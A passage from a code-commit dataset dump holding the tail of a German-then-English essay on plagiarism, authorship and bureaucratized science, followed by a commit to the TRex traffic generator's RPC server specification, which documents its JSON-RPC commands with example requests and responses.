und unkenntliche kopie. Man mu\u00df nun zugleich von der kunst fordern, das plagiat abzulehnen, ohne ihr das mittel der unkenntlichen kopie zu berauben.) Dies erm\u00f6glicht das originalgenie durch bestimmte offenheit in verbindung mit unbestimmter geschlossenheit {}. Dadurch wird die notwendige r\u00fcckkopplung der verschiedenen diskursbereiche gew\u00e4hrleistet.\n\nDas recht erfordert nicht nur eine unterscheidung von original\/kopie, sondern zugleich eine personenbezogene unterscheidung von originalautor\/kopierer. Eine unterscheidung die f\u00fcr die zunehmende differenzierung und komplexe strukturierung wissenschaftlicher textproduktion allerdings unhaltbar ist, allerdings \u00fcbernommen werden _mu\u00df_, soll die gratifikation einzelner personen gew\u00e4hrleistet werden. (Die gratifikation einzelner menschen ist weder rechtlich noch wissenschaftlich n\u00f6tig; selbst wenn personen h\u00e4ufig menschen entsprechen.) Nicht anders verh\u00e4lt es sich f\u00fcr die publizistik, die f\u00fcr weite verbreitung kopien ben\u00f6tigt. dies ist allerdings insofern kein problem, als die kopie nun weiter in legitimierte\/nicht-legitimierte kopie unterscheidbar ist; dies wird in der wissenschaft als zitat\/plagiat ausinterpretiert, in der publizistik als (bezahlte und vertraglich festgelegte) werkpublikation\/(unbezahlte\/unerlaubte) raubkopie. W\u00e4hrend die wissenschaft die eigene reglementierung zitat\/plagiat selbstst\u00e4ndig durchsetzen kann (ich komme darauf zur\u00fcck), ben\u00f6tigt die publizistik den r\u00fcckbezug auf das recht: hier wird zur regelung von vertragsverh\u00e4ltnissen die konzeption des geistigen eigentums etabliert; ein genialer streich {}, der zugleich den bezug originalautor-originalgenie expliziert, w\u00e4hrend er diesen mit den bereits bestehenden mitteln der rechtlichen eigentumsregelung analogisiert. 
In this way no completely new legal techniques have to be developed; only old means have to be modified.\n\n---\n\nBUREAUCRACY\n\nI leave both law and art aside (and leave their treatment to wittier minds) and occupy myself with science. As may have become apparent, I want to distinguish between research and science, insofar as science means bureaucratic research. The latter is then carried on in the form of academies (institutionalized science) and universities (academies combining teaching and research){}. The complex relation of effects between research, teaching and institution seems to me rarely to be treated in an adequate way. (Attention is then fixed above all on single differences: teaching-free research\/teaching-bound research, state organization\/private organization, non-academic research\/research. Much can be learned from that. Blind spots remain, however; these are then frequently not admitted; instead, the explanatory gaps are forced onto the distinction once chosen.{})\n\nThis circumstance may be due to the fact that research has long since been totally bureaucratized, that is, that hardly any unbureaucratic research remains: private scholars no longer play a significant role for science {}; corporate and company-bound research as well as popular science disqualified themselves long ago, once their ideology of independence was destroyed. That is why it is held on all sides that research is, and is only, what is done at universities.{} Rarely has progression been so conservative.\n\nConservative progression.\n\nThough mostly overlooked, there is progressive conservation: the intention to preserve adapts to new circumstances and is prepared to order and problematize its priorities openly.{} Likewise there is conservative progression: changes and novelties preserve established structures.{} This is not to be opposed to some \u00bbreal progress\u00ab \u2013 I hold no naive realism of ideology. Conservative progression, too, enables progress; and that it was chosen as a means suggests that it in particular has enabled (ordered) progression. {} The period from the 17th into the early 20th century is an indication. Rarely could one have observed such conservation of organizational structures accompanied by the changeability, and actual change, of their methods, techniques and results. Here flexibility profits from rigidity.\n\n\nMy conjecture: this is due to the strength of bureaucratic organization. Its forms are rigid but empty of content, which is why they can serve the extermination of the Jews as well as the preservation of democracy. The development of Germany is exemplary here: in the procedures for judging the opponents of the National Socialists, and in those that followed for adjudicating the crimes of the National Socialists, nothing changed \u2013 and of course everything did. The legal procedures as such did not have to be replaced, only modified; that is, certain steps had to be adapted.\n
(address {})\n\n\n\u2026\n\n{This by no means implies that professors are necessarily incapable \u2026 Professors are, after all, not only professors, but also mothers, artists, Muslims, voters, consumers and perhaps also somewhat mad blog authors. That a professor cannot view herself critically as a professor does not prevent her from taking a skeptical stance toward her own behavior in certain roles. Only, over the years this becomes ever more improbable, since longer training in patterns of explanation lets irritations be disqualified ever more skilfully and more \u00bbinnovatively\u00ab. One knows the phenomenon: the probability that a 5-year-old doubts that boys should not wear skirts is much higher than the probability that a 55-year-old lets himself be astonished by it. But the miracle of long-lived wonderment does exist.}\n\n\n---\n\nThat the problem is so central precisely in art is due to techniques of processing which science largely denies itself and for which a free space was created in art: the appropriation and working-through of a theme by varied execution; art probes the distinction original\/copy by applying it. (For exactly this reason there is, for Kusanowsky, also a difference between the \u00bbsportsman\u00ab and the \u00bbcriminal\u00ab. Both use the copy for artistic experiments. But the sportsman discloses his copy, marks it as such and admits it, while the criminal, for the sake of his economic interests of exploitation, does not admit the copy as such. (That is why the latter is no artistic working-through of the copy either; rather, the copying technique is a means of increasing economic profit.))\n\n\nhttps:\/\/differentia.wordpress.com\/2016\/08\/10\/kunst-sport-und-verbrechen\/\n\nBeltracchi could not impress the structure of art with his method; Landis, by contrast, could use the very same method to propose a novelty for the judgment of art.\n\n\nThis was not always so and may change again. Cf. Feyerabend.\n\nAlso painters, draughtsmen, stonemasons, etc., indeed composers too. Whether in the pictorial and musical arts of production (as opposed to the pictorial and musical arts of execution) the conception of the author can be described in the same way, I do not know. I suspect yes and no. They can be described with the same structures, as long as one avoids claiming that the developments were completely analogous.\n\n{Which is not the same thing. Determinate openness here means that the ensuing variative connections always serve a purpose (namely the support of the ideal of the original genius). Indeterminate closure means that the concept of the original genius forces all variations of its use to guarantee a universal placeability in all domains (that is, inclusion\/exclusion) on the model of the original genius, by whatever methods.}\n\nI am in no way being sarcastic: I find this introduction of subtle and complicated techniques fascinating and admirable. Rejections of the author concept frequently go along with a crude dismissal of past achievements and the reproach of a certain \u00bbconfusion\u00ab and \u00bberroneousness\u00ab.\n
A vocabulary that is astonishingly close to the very conception it rejects. \u2013 But even rejecting an _upholding_ of the original-author concept does not force one into a Rousseauist romanticism that calls for a return to the natural freedom of art (or something of the kind). \u2026\n\nMy distinction academy\/university is not superfluous. The combination of science with the teaching of that science conditions, and is conditioned by, certain forms of organization that affect research activity: universities train their own personnel. That does not necessarily hold for academies. \n\nIt is not at all improbable that I have simply not read something. In that case I am happy to be enlightened and will add it here. (In the comments below or at http:\/\/twitter.com\/bertrandterrier[@bertrandterrier].)\n\nI suspect this is changing. The internet seems to make possible a new type of researcher, to which the former private scholar comes closest. To describe and to grasp him, however, will probably require new means of observation and description, which will only improbably be established by university science, since this type threatens its securities of gratification.\n\nThis leads to the most narrow-minded utterances, which sometimes make one doubt whether universities are not in principle lacking the intelligence to do research. A friend tells me that, to the question of who counts as a philosopher, a lecturer answered him: the one who holds a degree in philosophy. That is silly, and one hopes for higher powers of thought among the physicians and pharmacists on whom one's own life depends.\n\nInteresting in this connection is the case in \u2026, where a conservative state votes for the admission of Syrian refugees.\n\nParadoxical as it sounds, one sees it everywhere: the Basic Law is a reformulation of the biblical commandments, the Enlightenment is secularized theology, 2016 is 1933, etc. This does not mean that every explanation of a (supposedly) new phenomenon by an old one is bad and wrong in principle. What can be observed, however, is a self-imposed blindness toward the new, a tendency to ignore new phenomena:\n\n\u00bbWhen the writer makes sure that the reader only finds something already familiar, the observation of the new can be thoroughly obstructed.\u00ab \u2013 Klaus Kusanowsky (@kusanowsky), 20 January 2017, https:\/\/twitter.com\/kusanowsky\/status\/822378844065644544\n\n\u00bbThe prevention of the new succeeds by ensuring the continued existence of the not-new.\u00ab \u2013 Klaus Kusanowsky (@kusanowsky), 20 January 2017, https:\/\/twitter.com\/kusanowsky\/status\/822377924409987073\n\nThis is not due to the ignorance of a great mass of scientists, but to the fixedness of a technique of observation that renders its own problems fundamentally invisible.\n
It takes no short training, after all, to teach oneself the blinding-out of certain problems and the ennoblement of others (this has by now grown to some 30 years: primary school, school, university studies, doctorate, habilitation).\n\nI do not mean \u00bbprogress\u00ab ideologically, which is why I prefer to speak of progression; which means nothing different and serves only the confusion that the author is presumably drawing attention to some shifted implication here. Progression is neither good nor bad, but neither is it a purely temporal succession of assumptions. It means that the later relates to the earlier; but that would hold just as well for a culture that suddenly performs a great renunciation of technology \u2013 insofar as this, too, is a stepping onward and precisely not a stepping back. (Forgetting is a difficult undertaking: I write about it here.)\n\nThe importance of unburdening the subject through addressability was, to my knowledge, an innovation of @ReisAgainst. At a rather lame lecture on the history of capitalism in a Marxist-communist context, the \u00bbexploitation\u00ab and \u00bbdependence\u00ab of the worker by and on the capitalist owners of enterprises were set against the \u00bbself-sufficiency\u00ab of the farmer with his own plot of land. @ReisAgainst made the (very intelligent) point that only the worker has an address for complaint and demand, while a strike helps the farmer not at all in a drought. On the significance of addressability I hope for a text from him; there seems to me to be much of interest in it. One could then also ask whether the addressability of everything to everyone is not a problem of modern bureaucracy. For the totality of addressability leads precisely to this: that everyone addressed simply refers one on to other addresses, until one gives up or is brushed off with a reference to the bureaucratic procedures themselves. Cf. on this also Arendt [MuG: 80]:\n\n____\nBureaucracy is that form of government in which there is no longer anyone who exercises power; and where all are equally powerless, we have a tyranny without a tyrant.
\n____\n\n---\n\nLITERATURE\n\nLuhmann, Niklas: Wissenschaft der Gesellschaft (stw 1001), Frankfurt\/M, ^7^2015 [1990]","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"75132c65c2927edec9b6beaccf2224561af5bb64","subject":"added handler for every 'owned' or 'active' command changed start_traffic \/ stop_traffic to have array of port id","message":"added handler for every 'owned' or 'active' command\nchanged start_traffic \/ stop_traffic to have array of port id\n","repos":"kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core","old_file":"trex_rpc_server_spec.asciidoc","new_file":"trex_rpc_server_spec.asciidoc","new_contents":"The TRex RPC Server\n===================\n:author: Itay Marom\n:email: <imarom@cisco.com>\n:revnumber: 1.70-0.0\n:quotes.++:\n:numbered:\n:web_server_url: http:\/\/trex-tgn.cisco.com\/trex\n:local_web_server_url: csi-wiki-01:8181\/trex\n\n\n\n== RPC Support On TRex\n\nTRex implements an RPC protocol for configuring, querying and, in general, executing remote calls on TRex.\n\nIn this document we provide the information a client needs in order to implement the protocol used to communicate with TRex.\n\nIn general, we will describe the following:\n\n* *Transport Layer* - The transport layer used to communicate with the TRex server\n* *RPC Representation Protocol* - The format in which remote procedures are carried\n\n=== Transport Layer\n\nThe TRex server transport layer is implemented using ZMQ.\n\nThe default configuration is TCP on port 5555; however, this is configurable.\n\n{zwsp} +\nThe communication model is based on the request-reply ZMQ model:\n\nhttp:\/\/zguide.zeromq.org\/page:all#Ask-and-Ye-Shall-Receive\n\n{zwsp} +\n\nFor more on ZMQ and its implementation, please refer to:\n{zwsp} +\nhttp:\/\/zeromq.org\/intro:read-the-manual\n\n=== RPC Representation Protocol\n\nThe RPC representation protocol is JSON RPC v2.0.\nEvery request and response is encoded in JSON RPC v2.0 format.\n\n{zwsp} +\n\nFor more info on the JSON RPC v2.0 spec, please refer to:\n{zwsp} +\n\nhttp:\/\/www.jsonrpc.org\/specification\n\n{zwsp} +\n\nLater on in the document we will describe all the supported commands.
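\n\nFor quick orientation, the sketch below shows how a single command travels inside the JSON RPC v2.0 envelope, using the 'ping' command that is documented in detail later in this document; the \"id\" value is an arbitrary correlation token chosen by the client and echoed back by the server:\n\n[source,bash]\n----\n'Request':\n\n{\n \"jsonrpc\": \"2.0\",\n \"id\": 1,\n \"method\": \"ping\",\n \"params\": null\n}\n\n'Response':\n\n{\n \"jsonrpc\": \"2.0\",\n \"id\": 1,\n \"result\": \"ACK\"\n}\n----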
\n\n=== TRex RPC Mock Server\nBefore we get into the commands, it's worth mentioning that TRex has a mock RPC server\ndesigned to allow playing around with the server in order to understand the responses\nand adjust the requests.\n\nTRex also provides a Python based console that can connect to the server (mock or real) and\nsend various commands to the server.\n\n==== Building The Mock Server\nBuilding the mock server is performed like this:\n[source,bash]\n----\ntrex-core\/linux> .\/b configure\ntrex-core\/linux> .\/b --target=mock-rpc-server-64-debug\n----\n\n==== Running The Mock Server\nLaunching the mock server is performed like this:\n\n[source,bash]\n----\n \ntrex-core\/scripts> .\/mock-rpc-server-64-debug\n\n-= Starting RPC Server Mock =-\n\nListening on tcp:\/\/localhost:5050 [ZMQ]\n\nSetting Server To Full Verbose\n\nServer Started\n\n----\n\n==== Using The TRex Console To Interact\nWhen the mock server is up, you can already send commands to the server.\n{zwsp} +\n{zwsp} +\n\nLet's demonstrate the operation with the Python based TRex console:\n\n{zwsp} +\n\n[source,bash]\n----\ntrex-core\/scripts> .\/trex-console\n\nConnecting To RPC Server On tcp:\/\/localhost:5050\n[SUCCESS]\n\n\n-=TRex Console V1.0=-\n\nType 'help' or '?' for supported actions\n\nTRex >\n\n----\nAs we will see later on, a basic RPC command supported by the server is 'ping'.\n{zwsp} +\nLet's issue a ping command to the server and see what happens on both sides:\n\n{zwsp} +\n{zwsp} +\n\nOn the 'client' side:\n\n[source,bash]\n----\nTRex > verbose on\n\nverbose set to on\n\nTRex > ping\n\n-> Pinging RPC server\n[verbose] Sending Request To Server:\n\n{\n \"id\": \"l0tog11a\",\n \"jsonrpc\": \"2.0\",\n \"method\": \"ping\",\n \"params\": null\n}\n\n[verbose] Server Response:\n\n{\n \"id\": \"l0tog11a\",\n \"jsonrpc\": \"2.0\",\n \"result\": \"ACK\"\n}\n\n[SUCCESS]\n\n----\nOn the 'server' side:\n\n[source,bash]\n----\n\ntrex-core\/scripts> .\/mock-rpc-server-64-debug\n\n-= Starting RPC Server Mock =-\n\nListening on tcp:\/\/localhost:5050 [ZMQ]\n\nSetting Server To Full Verbose\n\nServer Started\n\n\n[verbose][req resp] Server Received:\n\n{\n \"id\" : \"maa5a3g1\",\n \"jsonrpc\" : \"2.0\",\n \"method\" : \"ping\",\n \"params\" : null\n}\n\n[verbose][req resp] Server Replied:\n\n{\n \"id\" : \"maa5a3g1\",\n \"jsonrpc\" : \"2.0\",\n \"result\" : \"ACK\"\n}\n\n----\n\n== RPC Server State Machine\nThe RPC server can be in a number of states, and each state allows a different subset of the commands\nto be executed.\n\nWe define the following possible states:\n\n* *unowned* - No user owns the device, or it is owned by another user\n* *owned* - The server has been acquired by the client\n* *active* - The server is in the middle of injecting traffic - currently active\n\nEach command specifies the states in which it may be executed.\n\nFor commands valid only in the 'owned' or 'active' state, a field called ''handler'' 'MUST' be passed\nalong with the rest of the parameters.\n\n\nThis identifies the connection.\n\nimage::images\/rpc_states.png[title=\"RPC Server States\",align=\"left\",width=200, link=\"images\/rpc_states.png\"]\n\n== RPC Commands\nThe following RPC commands are supported\n\n=== Ping\n* *Name* - 'ping'\n* *Valid States* - 'all'\n* *Description* - Pings the TRex server\n* *Parameters* - None\n* *Result* ['string'] - \"ACK\" on success\n\nExample:\n\n[source,bash]\n----\n'Request':\n\n{\n \"jsonrpc\": \"2.0\",\n \"id\": 1,\n \"method\": \"ping\",\n \"params\": null\n}\n\n'Response':\n\n{\n \"jsonrpc\" : \"2.0\",\n \"id\" : 1,\n \"result\" : \"ACK\"\n}\n\n----\n\n=== Get Registered Commands\n* *Name* - 'get_reg_cmds'\n* *Valid States* - 'all'\n* *Description* - Queries the server for all the registered commands\n* *Parameters* - None\n* *Result* ['array'] - A list of all the commands supported by the server\n\nExample:\n\n[source,bash]\n----\n'Request':\n\n{\n \"jsonrpc\": \"2.0\",\n \"id\": 1,\n \"method\": \"get_reg_cmds\",\n \"params\": null\n}\n\n\n'Response':\n\n{\n \"jsonrpc\": \"2.0\",\n \"id\": 1,\n \"result\": [\n \"remove_all_streams\",\n \"remove_stream\",\n \"add_stream\",\n \"get_reg_cmds\",\n \"ping\",\n \"test_sub\",\n \"get_version\",\n \"test_add\"\n ]\n}\n\n----\n\n\n=== Get Version\n* *Name* - 'get_version'\n* *Valid States* - 'all'\n* *Description* - Queries the server for version information\n* *Parameters* - None\n* *Result* ['object'] - See table below\n\n.Object type 'return values for get_version' \n[options=\"header\",cols=\"1,1,3\"]\n|=================\n| Field | Type | Description \n| version | string | TRex version\n| build_date | string | build date\n| build_time | string | build time\n| built_by | string | who built this version\n|=================
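\n\nAn illustrative response might look like this (the field names follow the table above; all values below are placeholders, not actual version data):\n\n[source,bash]\n----\n'Response':\n\n{\n \"jsonrpc\": \"2.0\",\n \"id\": 1,\n \"result\": {\n \"version\": \"v1.70\",\n \"build_date\": \"Sep 16 2015\",\n \"build_time\": \"12:33:01\",\n \"built_by\": \"itay\"\n }\n}\n----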
\n\n=== Get System Info\n* *Name* - 'get_system_info'\n* *Description* - Queries the server for system properties\n* *Parameters* - None\n* *Result* ['object'] - See table below\n\n.return value: 'get_system_info'\n[options=\"header\",cols=\"1,1,3\"]\n|=================\n| Field | Type | Description \n| dp_core_count | int | DP core count\n| core_type | string | DP core type\n| hostname | string | machine host name\n| ip | string | machine IP\n| uptime | string | uptime of the server\n| port_count | int | number of ports on the machine\n| ports | array | array of objects of type ''port'' - see below\n|=================\n\n.return value: 'get_system_info'.'port'\n[options=\"header\",cols=\"1,1,3\"]\n|=================\n| Field | Type | Description \n| driver | string | driver type\n| speed | string | speed of the port (1g, 10g, 40g, 100g)\n| status | string | up \/ down\n|=================\n\n\n=== Get Owner\n* *Name* - 'get_owner'\n* *Valid States* - 'all'\n* *Description* - Queries the server for the current owner\n* *Parameters* - None\n* *Result* ['string'] - owner name if one exists, otherwise 'none'\n\n[source,bash]\n----\n\n'Request':\n\n{\n \"id\": \"hxjkuwj9\",\n \"jsonrpc\": \"2.0\",\n \"method\": \"get_owner\",\n \"params\": null\n}\n\n'Response':\n\n{\n \"id\": \"hxjkuwj9\",\n \"jsonrpc\": \"2.0\",\n \"result\": {\n \"owner\": \"itay\"\n }\n}\n\n----\n\n=== Acquire\n* *Name* - 'Acquire'\n* *Valid States* - 'all'\n* *Description* - Takes ownership over the device\n* *Parameters* -\n** *user* ['string'] - User name acquiring the system\n** *force* ['boolean'] - force the action even if another user is holding the device\n* *Result* ['string'] - 'unique' connection handler for future requests\n\n[source,bash]\n----\n\n'Request':\n\n{\n \"id\": \"b1tr56yz\",\n \"jsonrpc\": \"2.0\",\n \"method\": \"Acquire\",\n \"params\": {\n \"force\": false,\n \"user\": \"itay\"\n }\n}\n\n\n'Response':\n\n{\n \"id\": \"b1tr56yz\",\n \"jsonrpc\": \"2.0\",\n \"result\": \"4cBWDxS2\"\n}\n----\n\n\n=== Release\n* *Name* - 'release'\n* *Valid States* - 'owned'\n* *Description* - Releases ownership over the device\n* *Parameters* -\n** *handler* ['string'] - unique connection handler\n* *Result* ['string'] - \"ACK\" on success\n\n[source,bash]\n----\n\n'Request':\n\n{\n \"id\": \"m785dxwd\",\n \"jsonrpc\": \"2.0\",\n \"method\": \"release\",\n \"params\": {\n \"handler\": \"37JncCHr\"\n }\n}\n\n\n'Response':\n\n{\n \"id\": \"m785dxwd\",\n \"jsonrpc\": \"2.0\",\n \"result\": \"ACK\"\n}\n----\n\n\n=== Add Stream\n* *Name* - 'add_stream'\n* *Valid States* - 'owned'\n* *Description* - Adds a stream to a port\n* *Parameters* \n** *handler* ['string'] - unique connection handler\n** *port_id* ['int'] - port id associated with this stream\n** *stream_id* ['int'] - stream id associated with the stream object\n** *stream* - object of type xref:stream_obj['stream']\n* *Result* ['string'] - \"ACK\" in case of success\n\n==== Object type 'stream' anchor:stream_obj[]\n\nAdd_stream gets a single parameter of type object.\n\nThe format of that object is as follows:\n\n.Object type 'stream' \n[options=\"header\",cols=\"1,1,3\"]\n|=================\n| Field | Type | Description \n| enabled | boolean | is this stream enabled\n| self_start | boolean | is this stream triggered by starting injection or triggered by another stream\n| isg | double | ['usec'] inter stream gap - delay time in usec until the stream is started\n| next_stream_id | int | next stream to start after this stream. -1 means stop after this stream\n| packet | object | object of type xref:packet_obj['packet']\n| mode | object | object of type xref:mode_obj['mode']\n| vm | array | array of objects of type xref:vm_obj['vm']\n| rx_stats | object | object of type xref:rx_stats_obj['rx_stats']\n|=================
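\n\nTo make the table concrete, here is a minimal sketch of a 'stream' object (its shape follows the add_stream example later in this document; the field values are illustrative only):\n\n[source,bash]\n----\n{\n \"enabled\": true,\n \"self_start\": true,\n \"isg\": 0.0,\n \"next_stream_id\": -1,\n \"packet\": {\n \"binary\": [4, 1, 255],\n \"meta\": \"\"\n },\n \"mode\": {\n \"type\": \"continuous\",\n \"pps\": 100\n },\n \"vm\": [],\n \"rx_stats\": {\n \"enabled\": false\n }\n}\n----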
\n\n===== Object type 'packet' anchor:packet_obj[]\npacket contains binary and meta data\n\n.Object type 'packet'\n[options=\"header\",cols=\"1,1,3\"]\n|=================\n| Field | Type | Description\n| binary | byte array | binary dump of the packet to be used in the stream, as an array of bytes\n| meta | string | meta data object. opaque to the RPC server. will be passed on queries\n|=================\n\n===== Object type 'mode' anchor:mode_obj[]\nmode object can be 'one' of the following objects:\n\n.Object type 'mode - continuous' \n[options=\"header\",cols=\"1,1,3\"]\n|=================\n| Field | Type | Description\n| type | string | ''continuous''\n| pps | double | rate in packets per second \n|=================\n\n.Object type 'mode - single_burst' \n[options=\"header\",cols=\"1,1,3\"]\n|=================\n| Field | Type | Description\n| type | string | ''single_burst''\n| pps | double | rate in packets per second \n| total_pkts | int | total packets in the burst\n|=================\n\n.Object type 'mode - multi_burst' \n[options=\"header\",cols=\"1,1,3\"]\n|=================\n| Field | Type | Description\n| type | string | ''multi_burst''\n| pps | double | rate in packets per second \n| pkts_per_burst | int | packets in a single burst\n| ibg | double | ['usec'] inter burst gap. delay between bursts in usec\n| count | int | number of bursts. ''0'' means loop forever, ''1'' will fall back to single burst\n|=================\n\n===== Object type 'vm' anchor:vm_obj[]\nArray of VM instruction objects to be used with this stream\n\nAny element in the array can be one of the following object types:\n\n.Object type 'vm - fix_checksum_ipv4'\n[options=\"header\",cols=\"1,1,3\"]\n|=================\n| Field | Type | Description\n| type | string | ''fix_checksum_ipv4''\n| pkt_offset | uint16 | offset of the field to fix \n|=================\n\n.Object type 'vm - flow_var'\n[options=\"header\",cols=\"1,1,3\"]\n|=================\n| Field | Type | Description\n| type | string | ''flow_var''\n| name | string | flow var name - this should be a unique identifier\n| size | [1,2,4,8] | size of the flow var in bytes\n| op | ['inc', 'dec', 'random'] | operation type to perform on the field\n| init value | uint64_t as string | init value for the field\n| min value | uint64_t as string | minimum value for the field\n| max value | uint64_t as string | maximum value for the field\n|=================\n\n.Object type 'vm - write_flow_var'\n[options=\"header\",cols=\"1,1,3\"]\n|=================\n| Field | Type | Description\n| type | string | ''write_flow_var''\n| name | string | flow var name to write\n| pkt_offset | uint16 | offset at the packet to perform the write\n| add_value | int | delta to add to the field prior to writing - can be negative\n| is_big_endian | boolean | should write as big endian or little \n|=================
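\n\nAs an illustration, the following 'vm' array increments a 4 byte flow variable, writes it into the packet and fixes the IPv4 checksum afterwards. The name, offsets and values are placeholders only; they assume an Ethernet packet whose IPv4 header starts at byte offset 14 (so the source IP field sits at offset 26):\n\n[source,bash]\n----\n[\n {\n \"type\": \"flow_var\",\n \"name\": \"src_ip\",\n \"size\": 4,\n \"op\": \"inc\",\n \"init value\": \"167772161\",\n \"min value\": \"167772161\",\n \"max value\": \"167772417\"\n },\n {\n \"type\": \"write_flow_var\",\n \"name\": \"src_ip\",\n \"pkt_offset\": 26,\n \"add_value\": 0,\n \"is_big_endian\": true\n },\n {\n \"type\": \"fix_checksum_ipv4\",\n \"pkt_offset\": 14\n }\n]\n----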
\n\n===== Object type 'rx_stats' anchor:rx_stats_obj[]\nDescribes rx stats for the stream\n\n{zwsp} +\n\n'IMPORTANT':\n\nIn case rx_stats is enabled, meta data will be written at the end of the packet.\n\nPlease consider the following:\n\n==== Constraints\n* *performance* - this will have a performance impact, as rx packets will be examined\n* *override* - up to 10 bytes at the end of the packet will be overridden by the required meta data\n\n==== The bytes needed for activating 'rx_stats':\n\n* *rx_stream_id* consumes 2 bytes\n* *seq_enabled* consumes 4 bytes\n* *latency_enabled* consumes 4 bytes\n\nSo if neither seq nor latency is enabled, 2 bytes will be used.\n\n\nIf seq or latency alone is enabled, 6 bytes will be used.\n\n\nIf both are enabled, 10 bytes will be used.\n\n\n.Object type 'rx_stats'\n[options=\"header\",cols=\"1,1,3\"]\n|=================\n| Field | Type | Description\n| enabled | boolean | is rx_stats enabled for this stream\n| seq_enabled | boolean | should write 32 bit sequence\n| latency_enabled | boolean | should write 32 bit latency\n|=================\n\n[source,bash]\n----\n\n'Request':\n\n{\n \"id\": 1,\n \"jsonrpc\": \"2.0\",\n \"method\": \"add_stream\",\n \"params\": {\n \"handler\": \"37JncCHr\",\n \"port_id\": 1,\n \"stream_id\": 502,\n \"stream\": {\n \"enabled\": true,\n \"isg\": 4.3,\n \"mode\": {\n \"pps\": 3,\n \"total_pkts\": 5000,\n \"type\": \"single_burst\"\n },\n \"next_stream_id\": -1,\n \"packet\": {\n \"binary\": [\n 4,\n 1,\n 255\n ],\n \"meta\": \"\"\n },\n \"rx_stats\": {\n \"enabled\": false\n },\n \"self_start\": true\n }\n }\n}\n\n'Response':\n\n{\n \"id\": 1,\n \"jsonrpc\": \"2.0\",\n \"result\": \"ACK\"\n}\n\n\n----\n\n\n=== Remove Stream\n* *Name* - 'remove_stream'\n* *Valid States* - 'owned'\n* *Description* - Removes a stream from a port\n* *Parameters*\n** *handler* ['string'] - unique connection handler\n** *port_id* ['int'] - port associated with the stream\n** *stream_id* ['int'] - stream to remove\n\n* *Result* ['string'] - \"ACK\" in case of success\n\n[source,bash]\n----\n\n'Request':\n\n{\n \"id\": 1,\n \"jsonrpc\": \"2.0\",\n \"method\": \"remove_stream\",\n \"params\": {\n \"handler\": \"37JncCHr\",\n \"port_id\": 1,\n \"stream_id\": 502\n }\n}\n\n\n'Response':\n\n{\n \"id\": 1,\n \"jsonrpc\": \"2.0\",\n \"result\": \"ACK\"\n}\n\n----\n\n=== Get Stream ID List\n* *Name* - 'get_stream_list'\n* *Valid States* - 'owned', 'active'\n* *Description* - fetches all the associated streams for a port\n* *Parameters*\n** *handler* ['string'] - unique connection handler\n** *port_id* ['int'] - port to query for registered streams\n\n* *Result* ['array'] - array of 'stream_id'\n\n[source,bash]\n----\n\n'Request':\n\n{\n \"id\": 1,\n \"jsonrpc\": \"2.0\",\n \"method\": \"get_stream_list\",\n \"params\": {\n \"handler\": \"37JncCHr\",\n \"port_id\": 1\n }\n}\n\n'Response':\n\n{\n \"id\": 1,\n \"jsonrpc\": \"2.0\",\n \"result\": [\n 502,\n 18\n ]\n}\n\n\n----\n\n=== Get Stream\n* *Name* - 'get_stream'\n* *Valid States* - 'owned', 'active'\n* *Description* - gets a specific stream object\n* *Parameters*\n** *handler* ['string'] - unique connection handler\n** *port_id* ['int'] - port for the associated stream\n** *stream_id* ['int'] - the requested stream id\n\n* *Result* ['object'] - object xref:stream_obj['stream']\n\n[source,bash]\n----\n\n'Request':\n\n{\n \"id\": 1,\n \"jsonrpc\": \"2.0\",\n \"method\": \"get_stream\",\n \"params\": {\n \"handler\": \"37JncCHr\",\n \"port_id\": 1,\n \"stream_id\": 7\n }\n}\n\n\n'Response':\n\n{\n \"id\": 1,\n \"jsonrpc\": \"2.0\",\n \"result\": {\n \"stream\": {\n \"enabled\": true,\n \"isg\": 4.3,\n \"mode\": {\n \"pps\": 3,\n \"type\": \"continuous\"\n },\n \"next_stream_id\": -1,\n \"packet\": {\n \"binary\": [\n 4,\n 1,\n 255\n ],\n \"meta\": \"\"\n },\n \"self_start\": true\n }\n }\n}\n\n----\n\n\n=== Remove All Streams\n* *Name* - 'remove_all_streams'\n* *Valid States* - 'owned'\n
* *Description* - removes all streams from a port\n* *Parameters*\n** *handler* ['string'] - unique connection handler\n** *port_id* ['int'] - port for the associated streams\n\n* *Result* ['string'] - \"ACK\" on success\n\n\n[source,bash]\n----\n\n'Request':\n\n{\n \"id\": 1,\n \"jsonrpc\": \"2.0\",\n \"method\": \"remove_all_streams\",\n \"params\": {\n \"handler\": \"37JncCHr\",\n \"port_id\": 2\n }\n}\n\n'Response':\n\n{\n \"id\": 1,\n \"jsonrpc\": \"2.0\",\n \"result\": \"ACK\"\n}\n\n\n----\n\n\n=== Start Traffic\n* *Name* - 'start_traffic'\n* *Valid States* - 'owned'\n* *Description* - Starts the traffic on specific ports. If traffic has already started, an error will be returned\n* *Parameters*\n** *handler* ['string'] - unique connection handler\n** *port_id* ['array'] - array of port ids on which to start traffic\n\n* *Result* ['string'] - \"ACK\" on success\n\n[source,bash]\n----\n\n'Request':\n\n{ \n \"id\": \"b3llt8hs\",\n \"jsonrpc\": \"2.0\",\n \"method\": \"start_traffic\",\n \"params\": {\n \"handler\": \"37JncCHr\",\n \"port_id\": [3, 4]\n }\n}\n\n'Response':\n\n{\n \"id\": \"b3llt8hs\",\n \"jsonrpc\": \"2.0\",\n \"result\": \"ACK\"\n}\n\n\n----\n\n=== Stop Traffic\n* *Name* - 'stop_traffic'\n* *Valid States* - 'active'\n* *Description* - Stops the traffic on specific ports. If a port has already been stopped, nothing will happen\n* *Parameters*\n** *handler* ['string'] - unique connection handler\n** *port_id* ['array'] - array of port ids on which to stop traffic\n\n* *Result* ['string'] - \"ACK\" on success\n\n[source,bash]\n----\n\n'Request':\n\n{\n \"id\": \"h2fyhni7\",\n \"jsonrpc\": \"2.0\",\n \"method\": \"stop_traffic\",\n \"params\": {\n \"handler\": \"37JncCHr\",\n \"port_id\": [3, 4]\n }\n}\n\n'Response':\n\n{\n \"id\": \"h2fyhni7\",\n \"jsonrpc\": \"2.0\",\n \"result\": \"ACK\"\n}\n\n\n----\n\n\n","old_contents":"The TRex RPC Server\n===================\n:author: Itay Marom\n:email: <imarom@cisco.com>\n:revnumber: 1.70-0.0\n:quotes.++:\n:numbered:\n:web_server_url: http:\/\/trex-tgn.cisco.com\/trex\n:local_web_server_url: csi-wiki-01:8181\/trex\n\n\n\n== RPC Support On TRex\n\nTRex implements a RPC protocol in order to config, view 